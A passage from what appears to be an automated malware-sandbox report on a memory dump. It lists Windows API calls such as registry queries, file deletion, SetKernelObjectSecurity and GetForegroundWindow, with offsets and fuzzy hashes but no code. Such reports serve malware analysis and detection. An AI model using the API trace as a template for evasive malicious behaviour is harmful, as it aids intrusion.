                    • Instruction Fuzzy Hash: F7716970E00B499FDB14CFA9C894B9EBBB6FF48318F258529E815A7351D7709881CF91
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • RegQueryValueExA.KERNEL32(00000000,001E5879,00020119,00000000,00000000,?), ref: 001E5C4F
                    Memory Dump Source
                    • Source File: 00000008.00000002.2379637169.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false
                    Similarity
                    • API ID: QueryValue
                    • String ID:
                    • API String ID: 3660427363-0
                    • Opcode ID: 879b6962ffd1704b4f05cbab39f9970c4d6465cac538e338bdc73f1ca7caf2da
                    • Instruction ID: cf271d8239ce06b5223c202313f53f9185dfb7751bfb592339290edb074d8458
                    • Opcode Fuzzy Hash: 879b6962ffd1704b4f05cbab39f9970c4d6465cac538e338bdc73f1ca7caf2da
                    • Instruction Fuzzy Hash: 38817970D00B489FDB14CFA9C890B9EBBB6FF48318F248529E815A7351D7749881CF91
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • RegOpenKeyExA.KERNEL32(80000002,?,00000000,?,?), ref: 001E59F7
                    Memory Dump Source
                    • Source File: 00000008.00000002.2379637169.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false
                    Similarity
                    • API ID: Open
                    • String ID:
                    • API String ID: 71445658-0
                    • Opcode ID: 178e8014e189d24a7108a63ff83d908d0c0a73a215203ef3824eb8643170faa4
                    • Instruction ID: 1887be2fb1c24ea6879a6126573449d67d2d3ecad6cdbfc1e09515924dfd4281
                    • Opcode Fuzzy Hash: 178e8014e189d24a7108a63ff83d908d0c0a73a215203ef3824eb8643170faa4
                    • Instruction Fuzzy Hash: 8D413770D00A98DFDB14CF9AC884BDEBBB2FF48318F148529E918AB251D7749841CB91
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • RegOpenKeyExA.KERNEL32(80000002,?,00000000,?,?), ref: 001E59F7
                    Memory Dump Source
                    • Source File: 00000008.00000002.2379637169.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false
                    Similarity
                    • API ID: Open
                    • String ID:
                    • API String ID: 71445658-0
                    • Opcode ID: da0bb04afad8505ee32875f49b2cb823a542995a04432fd1acd86c18cae2f7fc
                    • Instruction ID: c25cf5e24c4a6931a84ad83096f1db04c5b205a569d685d48fe729946d10312c
                    • Opcode Fuzzy Hash: da0bb04afad8505ee32875f49b2cb823a542995a04432fd1acd86c18cae2f7fc
                    • Instruction Fuzzy Hash: 6D413870D00A98DFDB14CF9AC885BDDBBB6FF48318F148529E818A7251D7749841CF91
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • DeleteFileA.KERNELBASE(?), ref: 001E777C
                    Memory Dump Source
                    • Source File: 00000008.00000002.2379637169.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false
                    Similarity
                    • API ID: DeleteFile
                    • String ID:
                    • API String ID: 4033686569-0
                    • Opcode ID: 97c21e2da44fad001116faa03acf7f575ce535b72759f11981d7d43a16cd7435
                    • Instruction ID: aa7c859fbc7ffc610f2ecce5be86739e503df135fb867ae5ce8aa307dcb02f59
                    • Opcode Fuzzy Hash: 97c21e2da44fad001116faa03acf7f575ce535b72759f11981d7d43a16cd7435
                    • Instruction Fuzzy Hash: 2E4159B0D046989FEB10CFAAD889BDDBBF1FF48314F15852AE814A7290D7749845CF91
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • DeleteFileA.KERNELBASE(?), ref: 001E777C
                    Memory Dump Source
                    • Source File: 00000008.00000002.2379637169.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false
                    Similarity
                    • API ID: DeleteFile
                    • String ID:
                    • API String ID: 4033686569-0
                    • Opcode ID: 949a52e93b2bb6fd91cf139121c7f2cc8ddb6c6b3bf18f66fc1e8eb1b9fe459b
                    • Instruction ID: b8d3f3ed3fa3e59975fff68811d1f264c897268fe977a1e3bbb4453fc05b853a
                    • Opcode Fuzzy Hash: 949a52e93b2bb6fd91cf139121c7f2cc8ddb6c6b3bf18f66fc1e8eb1b9fe459b
                    • Instruction Fuzzy Hash: 3C4147B0D046988FEB10CFAAC8897DEBBF5FF48314F14852AE814A7280D7749841CF91
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • SetKernelObjectSecurity.KERNELBASE(001348B0,00000004,00000000,?,?,?,?,?,00000000,?,001E7B2C,00000000), ref: 001E7BC6
                    Memory Dump Source
                    • Source File: 00000008.00000002.2379637169.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false
                    Similarity
                    • API ID: KernelObjectSecurity
                    • String ID:
                    • API String ID: 3015937269-0
                    • Opcode ID: 5dcb50e031c44ef2b42d61da1d0797a1968dacdaba35878be969b3853a2b33e1
                    • Instruction ID: 7da4b11a45f25e8d5ae26b4f43a39a508abd2bd3f9cdcb149d8874a75c1c49cf
                    • Opcode Fuzzy Hash: 5dcb50e031c44ef2b42d61da1d0797a1968dacdaba35878be969b3853a2b33e1
                    • Instruction Fuzzy Hash: 2D2128B19046499FDB14CF9AC485BEEFBF8EB48314F54842AE918B7340D374A944CFA1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • SetKernelObjectSecurity.KERNELBASE(001348B0,00000004,00000000,?,?,?,?,?,00000000,?,001E7B2C,00000000), ref: 001E7BC6
                    Memory Dump Source
                    • Source File: 00000008.00000002.2379637169.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false
                    Similarity
                    • API ID: KernelObjectSecurity
                    • String ID:
                    • API String ID: 3015937269-0
                    • Opcode ID: 09234964fa344207d1b073b17e675383e030f7577cbf653eda77843652f799c0
                    • Instruction ID: aa79d6bbe9b492eca7b1f7fe7c2ec9b05a39d01897f181f81faa05f01eb6b3ea
                    • Opcode Fuzzy Hash: 09234964fa344207d1b073b17e675383e030f7577cbf653eda77843652f799c0
                    • Instruction Fuzzy Hash: 682139B19006498FDB14CF9AD885BDEFBF4FB48314F54842AD918A7350D378AA45CFA1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • RegCloseKey.KERNEL32(00000000), ref: 001E5D8F
                    Memory Dump Source
                    • Source File: 00000008.00000002.2379637169.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false
                    Similarity
                    • API ID: Close
                    • String ID:
                    • API String ID: 3535843008-0
                    • Opcode ID: e61e8888c92041fb855e2c670ec89f1752159c82cac031ba66aa074cefd7464e
                    • Instruction ID: 3c9a03f10350f5351ea79c553c68f5651edd88608f6d97d8f1fe1413bca331dc
                    • Opcode Fuzzy Hash: e61e8888c92041fb855e2c670ec89f1752159c82cac031ba66aa074cefd7464e
                    • Instruction Fuzzy Hash: 5B1146B18006498FCB10CF99D888BDEFBF8FB49314F24881AD558A3310C374A944CFA1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • RegCloseKey.KERNEL32(00000000), ref: 001E5D8F
                    Memory Dump Source
                    • Source File: 00000008.00000002.2379637169.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false
                    Similarity
                    • API ID: Close
                    • String ID:
                    • API String ID: 3535843008-0
                    • Opcode ID: 8eee1be40879bcd4642f80b0b7c58f1935ad62c3fa99e90b2d6748949a6f489b
                    • Instruction ID: 252056ead5a5a3dff9ed898a755b3250b128ae46a0a7b2335df0bf838e066701
                    • Opcode Fuzzy Hash: 8eee1be40879bcd4642f80b0b7c58f1935ad62c3fa99e90b2d6748949a6f489b
                    • Instruction Fuzzy Hash: 2D1102B4900649CFCB10CF9AD888BDEFBF8FB48314F24881AD618A7210D775A944CBA1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • GetForegroundWindow.USER32 ref: 001E5F0C
                    Memory Dump Source
                    • Source File: 00000008.00000002.2379637169.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false
                    Similarity
                    • API ID: ForegroundWindow
                    • String ID:
                    • API String ID: 2020703349-0
                    • Opcode ID: 48e856a2e1282cfbefa918061fd4a7e13fa3e1c10e52a38dd7be8810c0c4c6bf
                    • Instruction ID: 25d31404a3fc683211bcb76edaf37370800282dc6a9b6906e133797577e56691
                    • Opcode Fuzzy Hash: 48e856a2e1282cfbefa918061fd4a7e13fa3e1c10e52a38dd7be8810c0c4c6bf
                    • Instruction Fuzzy Hash: 511122B48006488FCB20CF99D488BEEFFF4EB49314F24885AC919B7210C374A944CFA1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • GetForegroundWindow.USER32 ref: 001E5F0C
                    Memory Dump Source
                    • Source File: 00000008.00000002.2379637169.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false
                    Similarity
                    • API ID: ForegroundWindow
                    • String ID:
                    • API String ID: 2020703349-0
                    • Opcode ID: e23166cffc0aa4e4d455816da6ba45dfa1e9bf1778bdd358bb675c9545917c19
                    • Instruction ID: 32c88b7492e1c986a08515de88287c1d274e48eefdb5fe84fac8e7fe16e6641a
                    • Opcode Fuzzy Hash: e23166cffc0aa4e4d455816da6ba45dfa1e9bf1778bdd358bb675c9545917c19
                    • Instruction Fuzzy Hash: 0811D0B59006498FDB10CF9AD489BDEFBF8EB48324F24885AD919B7350D374A944CFA1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Strings
                    Memory Dump Source
                    • Source File: 00000008.00000002.2379827098.00000000005C0000.00000040.00000001.sdmp, Offset: 005C0000, based on PE: false
                    Similarity
                    • API ID:
                    • String ID: 48*m
                    • API String ID: 0-673043727
                    • Opcode ID: 453558cf0a29a575f9d51f62852371b4bb78b0d8aa57c61bcceb5497ed8fd7b5
                    • Instruction ID: 7e7305231a5afeffd9c4ec364ebfa2f1ccbf743418b614618abf0af03a710da5
                    • Opcode Fuzzy Hash: 453558cf0a29a575f9d51f62852371b4bb78b0d8aa57c61bcceb5497ed8fd7b5
                    • Instruction Fuzzy Hash: 31216034B04A059FCB18DFA0C451AEEBBB2FB89700F214D6DD4036B285DF74AD468799
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Strings
                    Memory Dump Source
                    • Source File: 00000008.00000002.2379827098.00000000005C0000.00000040.00000001.sdmp, Offset: 005C0000, based on PE: false
                    Similarity
                    • API ID:
                    • String ID: \E*m
                    • API String ID: 0-2326196704
                    • Opcode ID: 1bc9829469fd606aae0d16d65ef50c6863c9fef98318aa8810f4827591147936
                    • Instruction ID: 462107e49c3e1e27ddd5271abb6a41ba146036b7884a078971fea4f9c8ff6653
                    • Opcode Fuzzy Hash: 1bc9829469fd606aae0d16d65ef50c6863c9fef98318aa8810f4827591147936
                    • Instruction Fuzzy Hash: E6012671305210AFC7016BF9AC1986E7BADEF9A360354087EF006C7352DA349C4183A1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Strings
                    Memory Dump Source
                    • Source File: 00000008.00000002.2379827098.00000000005C0000.00000040.00000001.sdmp, Offset: 005C0000, based on PE: false
                    Similarity
                    • API ID:
                    • String ID: \E*m
                    • API String ID: 0-2326196704
                    • Opcode ID: 54b4ded225772ad73d1feb521b6073fe92d750aef627090e22835ac133598dc7
                    • Instruction ID: 9a7d2e6f6b2c96e54202e8626c1009872ae05eb9fa332366eebb91d31b2549a9
                    • Opcode Fuzzy Hash: 54b4ded225772ad73d1feb521b6073fe92d750aef627090e22835ac133598dc7
                    • Instruction Fuzzy Hash: D2F06D76701220AF8B057BF9A80986EBAAEEB9D760394493DF40AC3345DE759C4187A1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Strings
                    Memory Dump Source
                    • Source File: 00000008.00000002.2379827098.00000000005C0000.00000040.00000001.sdmp, Offset: 005C0000, based on PE: false
                    Similarity
                    • API ID:
                    • String ID: 48*m
                    • API String ID: 0-673043727
                    • Opcode ID: 7f3be0985ce15753e23492e7069986c9cacfeec08821546d4fe0f820e756e875
                    • Instruction ID: 64828f536db80b8f504db9242f68f4a12d3615ef5f2316eb960aea0b115d2f61
                    • Opcode Fuzzy Hash: 7f3be0985ce15753e23492e7069986c9cacfeec08821546d4fe0f820e756e875
                    • Instruction Fuzzy Hash: 25F0D130B002095BCB08EFE0D412ADEB722EB84714F118928D501AB286DFB4A98687E4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000008.00000002.2379827098.00000000005C0000.00000040.00000001.sdmp, Offset: 005C0000, based on PE: false
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 9c019f59f8344d820eeb4674ab2c4b8bdaaa117c738c014200e6b4e3c75b3e3e
                    • Instruction ID: 66515b8dadf101dbee162929ad8c9fa8a289ee7dc53d1deafb837ea225f2990a
                    • Opcode Fuzzy Hash: 9c019f59f8344d820eeb4674ab2c4b8bdaaa117c738c014200e6b4e3c75b3e3e
                    • Instruction Fuzzy Hash: FC915D70A04205DFCB24CFA9D584FAEBBF5BB88310F15852EE416A7291DB74E981CB61
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000008.00000002.2379827098.00000000005C0000.00000040.00000001.sdmp, Offset: 005C0000, based on PE: false
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 07c04a502b890e324e8cb8ac5612dd8b6fe0ec04df99c04b0e06a3cbe14a63ff
                    • Instruction ID: 75ccd55dd765bd6d2926925deaa4ee601a9384d72cd73d345530d634ee70521f
                    • Opcode Fuzzy Hash: 07c04a502b890e324e8cb8ac5612dd8b6fe0ec04df99c04b0e06a3cbe14a63ff
                    • Instruction Fuzzy Hash: 0F5110B0E046188FDB14CFA9C884BDDFBB5BF49314F15802EE829AB251D774A845CF95
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000008.00000002.2379827098.00000000005C0000.00000040.00000001.sdmp, Offset: 005C0000, based on PE: false
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 60471d18cf1b7b0c2ce80def76371eec140c8d598b760eab0502fe3462115012
                    • Instruction ID: 9487d58c56ec1ea7eedea9f2e17f7d3798781963af1f746f66d78baad515a945
                    • Opcode Fuzzy Hash: 60471d18cf1b7b0c2ce80def76371eec140c8d598b760eab0502fe3462115012
                    • Instruction Fuzzy Hash: 50510FB0E046188FDB14CFE9C884B9DBBB5BF49314F15802AE829AB251D774A845CF95
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000008.00000002.2379827098.00000000005C0000.00000040.00000001.sdmp, Offset: 005C0000, based on PE: false
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: a20b4f1bdc49287e5fa8a2fb0d6451e4131c5b51222fce2a5c2adfdb86139736
                    • Instruction ID: 0371defb8b4c4c5549f8d8386c6d6df2b3f42d3e2d672ac7fc758390b2ce8391
                    • Opcode Fuzzy Hash: a20b4f1bdc49287e5fa8a2fb0d6451e4131c5b51222fce2a5c2adfdb86139736
                    • Instruction Fuzzy Hash: 9341B830609380DFC706DBB5DC69BAA7FB6BF86300B56489ED042D72D2EA745841CB62
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000008.00000002.2379827098.00000000005C0000.00000040.00000001.sdmp, Offset: 005C0000, based on PE: false
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 6526bd13f4d59b1e3615e0357181dd44c91d9eb5a279f62cbb7ab5983c8d8121
                    • Instruction ID: a2f666922f67ea91b923128bd4ad2a6812bdd44e2fb55ce99243f8a8b6179052
                    • Opcode Fuzzy Hash: 6526bd13f4d59b1e3615e0357181dd44c91d9eb5a279f62cbb7ab5983c8d8121
                    • Instruction Fuzzy Hash: A7311E30A05F40CED738CB6AC550B66BBF1BF86305F14C86EC49B86A61D736A845DB15
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000008.00000002.2379827098.00000000005C0000.00000040.00000001.sdmp, Offset: 005C0000, based on PE: false
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: f96654849d505a95a7f00a8322bab56eb554160c874920c46a41fa720fa90c29
                    • Instruction ID: eb8620fec66ee69b25f3540df2da15ee877f18a0c88c1dfd03d2dbe034ddf10a
                    • Opcode Fuzzy Hash: f96654849d505a95a7f00a8322bab56eb554160c874920c46a41fa720fa90c29
                    • Instruction Fuzzy Hash: 923115B0D042489FCB10CFE9D894BDEBFF5AF49304F29842EE515AB251DBB49945CB90
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000008.00000002.2379827098.00000000005C0000.00000040.00000001.sdmp, Offset: 005C0000, based on PE: false
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 79b2762205a8baf44723fcb6c953984f88fee0f994cd51a25b0ce4d73605eb05
                    • Instruction ID: e187d743fa700572f29546894688e7b88f7f45a8c2d86dc94fc3934fe2c2111a
                    • Opcode Fuzzy Hash: 79b2762205a8baf44723fcb6c953984f88fee0f994cd51a25b0ce4d73605eb05
                    • Instruction Fuzzy Hash: 2E3138316046A0CFCB258BB89414BFDBBB5FF89301F10487EE046AB292DB359885C7A5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000008.00000002.2379827098.00000000005C0000.00000040.00000001.sdmp, Offset: 005C0000, based on PE: false
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: d4bce64a46d7484aa2c43f25b949883d0ed8cde885a56b6cd19b791883604681
                    • Instruction ID: 1422d5f91416d1666f35713e72fcfb44609eb64781c889ceedb32be61ff0dc0a
                    • Opcode Fuzzy Hash: d4bce64a46d7484aa2c43f25b949883d0ed8cde885a56b6cd19b791883604681
                    • Instruction Fuzzy Hash: 0B318174604244DFC704EFE5D858BAE7BA6BB84300FA6986CD502E73D5EB74AC41CB61
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000008.00000002.2379827098.00000000005C0000.00000040.00000001.sdmp, Offset: 005C0000, based on PE: false
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 0ed269715fe4f80fb01ed262ac3add1b1d3bbb0d0b79db92ccf9dc3e9461305a
                    • Instruction ID: d2ebe295556dd7e9b3d516dd794e995e709fcc7fede56869d6957ff15475d195
                    • Opcode Fuzzy Hash: 0ed269715fe4f80fb01ed262ac3add1b1d3bbb0d0b79db92ccf9dc3e9461305a
                    • Instruction Fuzzy Hash: 643105B0D002089FCB14CFE9C480BDEBFF5BF48304F298429E919AB255DB749945CB94
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000008.00000002.2379827098.00000000005C0000.00000040.00000001.sdmp, Offset: 005C0000, based on PE: false
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 42867d52eb7a1fff7b818790c843cdf1ea431aa0caf3d914cc66ff4204996618
                    • Instruction ID: 7b242d48de2ab05b065d3c9be3d140ac45c3e1a6ce7c2fd60cdaabed40288b1f
                    • Opcode Fuzzy Hash: 42867d52eb7a1fff7b818790c843cdf1ea431aa0caf3d914cc66ff4204996618
                    • Instruction Fuzzy Hash: A3317A30A08200CFCB45AFB8D818B6E7BA2BFC4305F14986ED096C76A1DF344991DB92
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000008.00000002.2379827098.00000000005C0000.00000040.00000001.sdmp, Offset: 005C0000, based on PE: false
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: b305b7c748db800850a930416bb8e468e716efd483035cf9bd72083502ec732f
                    • Instruction ID: b83a5400197f1e88402664390d6914d263af4506952e828791a3b2a726acc1e9
                    • Opcode Fuzzy Hash: b305b7c748db800850a930416bb8e468e716efd483035cf9bd72083502ec732f
                    • Instruction Fuzzy Hash: A0318F346017009FC755DBB9C844AAEBBF6BF8A304B60882DD546D7B51DB31E842CBA5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000008.00000002.2379827098.00000000005C0000.00000040.00000001.sdmp, Offset: 005C0000, based on PE: false
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: a37a6ebd55408128a9d9ab65fe5016204deb13d37b2a7ecd1d819ab33cfe6863
                    • Instruction ID: 99f98ff1994574092712fe682ac80625bc1e3e6ab8c9a6d38b0db9d8d110b7c3
                    • Opcode Fuzzy Hash: a37a6ebd55408128a9d9ab65fe5016204deb13d37b2a7ecd1d819ab33cfe6863
                    • Instruction Fuzzy Hash: 5A314974900309DFCB14CFA5D484AADBBB5FF44318F24856EE509AB341D771A986CF90
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000008.00000002.2379598288.000000000013D000.00000040.00000001.sdmp, Offset: 0013D000, based on PE: false
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 7ea34cd0e5b25ef0f0337ebdd78e23f6c593bc1acfc99d4f48def6f4af691200
                    • Instruction ID: b0b6c816e5750f404bafcc0e4a5f81ef2a91ab1f821abd0ccfe4f8b921259954
                    • Opcode Fuzzy Hash: 7ea34cd0e5b25ef0f0337ebdd78e23f6c593bc1acfc99d4f48def6f4af691200
                    • Instruction Fuzzy Hash: D721F275604204EFDB15CF64F980B27BBA5FB84314F24C9A9E84A4B342C336D856CA61
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000008.00000002.2379598288.000000000013D000.00000040.00000001.sdmp, Offset: 0013D000, based on PE: false
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 9a5aa2dbcf62e1ca65e98eb5a654f7993e2ea605ad273f04915808f45b782293
                    • Instruction ID: ca15d656f9603b16e440dcff087ba4ce18b7037373494b38b51e211c1564cfb2
                    • Opcode Fuzzy Hash: 9a5aa2dbcf62e1ca65e98eb5a654f7993e2ea605ad273f04915808f45b782293
                    • Instruction Fuzzy Hash: 4C21F275604344DFDB28CF64F884B16BB65EB84B14F34C9A9E84A4B346C33AD857CB61
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000008.00000002.2379827098.00000000005C0000.00000040.00000001.sdmp, Offset: 005C0000, based on PE: false
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 4b56891cbb164733d3ca0d10c6e3bd4db62e0eaa1516306cce23811169060e67
                    • Instruction ID: b7e8a0b684d324cef523fa6640427c743b8003af4a258f26c6a6e9a583b62a34
                    • Opcode Fuzzy Hash: 4b56891cbb164733d3ca0d10c6e3bd4db62e0eaa1516306cce23811169060e67
                    • Instruction Fuzzy Hash: 65218034900349DFCB15CFA5C480E9EBBB1FF45304F24896DE505AB291EB71A986CF80
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000008.00000002.2379598288.000000000013D000.00000040.00000001.sdmp, Offset: 0013D000, based on PE: false
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: ba8138cfc5b38647068a1c2b42c80fd435ab124441ab4b8ddbdbd03d65f50ccf
                    • Instruction ID: fb50fe871c04d81ac2afeea991571bfbe0ad771155a08a4a130eccbc262fac54
                    • Opcode Fuzzy Hash: ba8138cfc5b38647068a1c2b42c80fd435ab124441ab4b8ddbdbd03d65f50ccf
                    • Instruction Fuzzy Hash: 6B2183754083809FCB16CF14E994715BF71EF46714F28C5DAD8458F256C33AD856CB62
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000008.00000002.2379598288.000000000013D000.00000040.00000001.sdmp, Offset: 0013D000, based on PE: false
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 12bfa8ebe33e4b9065d812a0b306cff2c68951779c0bd00fc27043ad86a6bde3
                    • Instruction ID: 8cddcecf6180dfd98c341649b91beecd33e3b47da4d9b3c3529a656eb34fe1d1
                    • Opcode Fuzzy Hash: 12bfa8ebe33e4b9065d812a0b306cff2c68951779c0bd00fc27043ad86a6bde3
                    • Instruction Fuzzy Hash: CA119A75904280DFDB12CF10E5C4B16FFA1FB84314F28C6AEE8494B656C33AD85ACB62
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000008.00000002.2379827098.00000000005C0000.00000040.00000001.sdmp, Offset: 005C0000, based on PE: false
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 7453876d95a39187326a913bc75781654e055df21fcd0c2e8fb4c17e5be38d30
                    • Instruction ID: e483cada3ad7c6363d2123badd2fadfda84c8ce5f3c2c904d9043fb5750a3fa0
                    • Opcode Fuzzy Hash: 7453876d95a39187326a913bc75781654e055df21fcd0c2e8fb4c17e5be38d30
                    • Instruction Fuzzy Hash: 8201D431604914CFCB149AD4C514BBEBBB2FF87314F28495EC4036B682CF65AD42D795
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000008.00000002.2379827098.00000000005C0000.00000040.00000001.sdmp, Offset: 005C0000, based on PE: false
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 2e0b7b605d180653e329222a7f1c54d6d2a06cbde560e81529e3ea7fbb71dd1b
                    • Instruction ID: 408fa638504ce38dc24a344aad0b5040273dda776ca0c072720ba288951a222a
                    • Opcode Fuzzy Hash: 2e0b7b605d180653e329222a7f1c54d6d2a06cbde560e81529e3ea7fbb71dd1b
                    • Instruction Fuzzy Hash: 45F0F03260D6D00EDB2242FC2848BA96F50A7C3321F2909BFD48BC7183D0544C04977A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000008.00000002.2379827098.00000000005C0000.00000040.00000001.sdmp, Offset: 005C0000, based on PE: false
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 03d05eba18898af1066d7158be1e56f2cca8a6cbebc910890ac5e4dc00db5ecc
                    • Instruction ID: 734ecc0805e8f6c2bdc6cf6364c3cef8a4b127f32c60a843c43d2416af0d4f6e
                    • Opcode Fuzzy Hash: 03d05eba18898af1066d7158be1e56f2cca8a6cbebc910890ac5e4dc00db5ecc
                    • Instruction Fuzzy Hash: 1C018C70808309CED764DFB4C014BEABBE4FF00308F604D2DC18697680DBB06608DB92
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000008.00000002.2379827098.00000000005C0000.00000040.00000001.sdmp, Offset: 005C0000, based on PE: false
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: e4a420938a9fc86ed4b52a08a3b71a4e64fe01b26c4b878505cd26d63a2f6272
                    • Instruction ID: 4cf05c9e08e47aacd57720a4d05be6c516b0ef26ee66b4ab64fb61b94cbed2e0
                    • Opcode Fuzzy Hash: e4a420938a9fc86ed4b52a08a3b71a4e64fe01b26c4b878505cd26d63a2f6272
                    • Instruction Fuzzy Hash: FFF02736608A404FCB159298D8A0D7A3B59CBC27603158CAED05AD7243DB628C024799
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000008.00000002.2379827098.00000000005C0000.00000040.00000001.sdmp, Offset: 005C0000, based on PE: false
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: c8a82afd4a6aab22ba63fa44ec737aed123908a0b6ba9130df8b7bd43b3c90c1
                    • Instruction ID: 62f669b1d02742fb808f8630f6b767f6f8ba6d513790b77675cd9e2c4c9e1e38
                    • Opcode Fuzzy Hash: c8a82afd4a6aab22ba63fa44ec737aed123908a0b6ba9130df8b7bd43b3c90c1
                    • Instruction Fuzzy Hash: A1E0122440F7C09FC3138BB08CE19D63F74AD0310130D98CBC492CB1A3D6492D4ACBA6
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000008.00000002.2379827098.00000000005C0000.00000040.00000001.sdmp, Offset: 005C0000, based on PE: false
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 8459790242cdcbba37c1529c5935a22020fe9886ec929aca35aac8f49c567b49
                    • Instruction ID: 53ff580042f20ca2458f6ab9c2080c8fcdb844bc2d026a589e946bcfc603e04e
                    • Opcode Fuzzy Hash: 8459790242cdcbba37c1529c5935a22020fe9886ec929aca35aac8f49c567b49
                    • Instruction Fuzzy Hash: 51E09A35200A105F8A18A299E460D6A779EDAC27643108C2EA51ADB342EF62EC0247E8
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000008.00000002.2379827098.00000000005C0000.00000040.00000001.sdmp, Offset: 005C0000, based on PE: false
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 81116facdbcadf6d08f7b0dc1dc15c161331121860f2313a42609a12265819d9
                    • Instruction ID: f135b771b0d4f836a2ff393a63376086f0363e4da7dc77d2d0877a72fac2665f
                    • Opcode Fuzzy Hash: 81116facdbcadf6d08f7b0dc1dc15c161331121860f2313a42609a12265819d9
                    • Instruction Fuzzy Hash: 1FE092301057A04FC711DFA8E8608D6BBB4DF87204304899FD486DB252DB21AD068BD0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000008.00000002.2379827098.00000000005C0000.00000040.00000001.sdmp, Offset: 005C0000, based on PE: false
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
